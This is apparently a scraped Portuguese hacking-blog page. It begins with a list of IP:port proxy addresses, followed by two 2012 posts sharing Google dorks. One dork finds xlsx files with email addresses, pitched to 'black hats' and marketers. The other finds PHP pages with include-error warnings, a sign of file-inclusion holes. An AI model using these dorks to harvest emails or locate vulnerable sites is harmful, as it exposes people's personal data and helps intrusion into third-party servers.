205.139.53.1:3128
158.43.240.12:3128
195.242.79.21:8080
195.242.79.21:80
207.170.23.34:8080
216.34.244.240:80
134.50.253.13:80
147.160.216.10:80
207.35.44.34:8080
207.229.251.2:80
216.162.66.2:80
158.43.240.15:3128
195.26.224.40:3128
194.144.156.250:8080
165.117.54.87:8080
158.43.240.14:3128
193.60.48.94:3128
212.19.48.5:3128
195.10.102.218:80
195.74.130.246:80
209.130.129.213:80
208.151.170.22:80
206.47.244.94:80
129.187.184.87:80
12.7.10.3:80
202.61.69.2:80
202.229.116.182:8080
198.111.46.146:8080
156.63.41.8:7036
151.4.76.180:80
132.250.196.3:9000
195.145.114.226:8080
199.33.225.16:83
212.56.32.5:80
141.35.4.20:8080
209.165.181.3:80
195.114.243.100:8080
158.43.128.51:3128
212.1.128.61:8080
158.43.240.11:3128
158.43.240.10:3128
195.17.132.98:8080
158.43.128.105:3128
195.3.86.138:3128
194.184.30.78:8080
193.4.157.227:80
141.7.1.181:80
212.4.64.26:80
202.160.12.35:8080
194.224.78.28:80
216.111.118.8:3128
194.126.101.250:80
194.144.156.251:8080
210.162.232.194:8080
158.43.240.8:3128
137.204.148.72:3128
203.128.3.19:80
193.193.32.4:3128
193.252.124.3:8080
194.229.128.2:80
194.144.156.251:80
194.204.205.10:80
209.77.114.4:8080
194.73.231.251:80
212.45.33.6:3128
210.239.3.34:8080
194.247.134.131:80
210.128.182.30:80
210.124.228.2:80
195.74.130.247:80
158.43.128.104:3128
130.192.3.29:8080

segunda-feira, 23 de julho de 2012

Dork buscar emails dentro de arquivos xlsx.

Dork busca email em arquivo xlsx

Criei essa dork simples mais com resultados que pode interessar desde um black Hat á uma pessoa que trabalha com marketing.
Tema buscar dados em arquivo xlsx dentro de servidores.

Aqui no caso vamos procurar textos que tem o termo =  Paraíba  + possuem também o "mail",
eu quero E-mail, podem me perguntar porque você não coloca E-mail ou Email.
Colocando  intext:(email|mail)  = dentro da pesquisa tem que possuir Email ou mail, ou seja meu-Email,emails assim vai.
Essa é uma dork básica você pode personalizar ela, e mudar a extensão do arquivo para xls = ext:xls vai da sua criatividade & necessidade.


Dork: +intext:"Paraíba"  intext:(email|mail)   ext:xlsx




segunda-feira, 28 de maio de 2012

Essa dork vai para os carinhas da net que gosta de um Scanner especifico pra vulneráveis php

Essa dork vai para os carinhas da net que gosta de um Scanner especifico pra vulneráveis php

Essa dork vai para os carinhas da net que gosta de um Scanner especifico pra vulneráveis php


Dork:  inurl:"*.php?*=*.php" intext:"Warning: include" -inurl:.html -site:"php.net" -site:"stackoverflow.com" -inurl:"*forums*"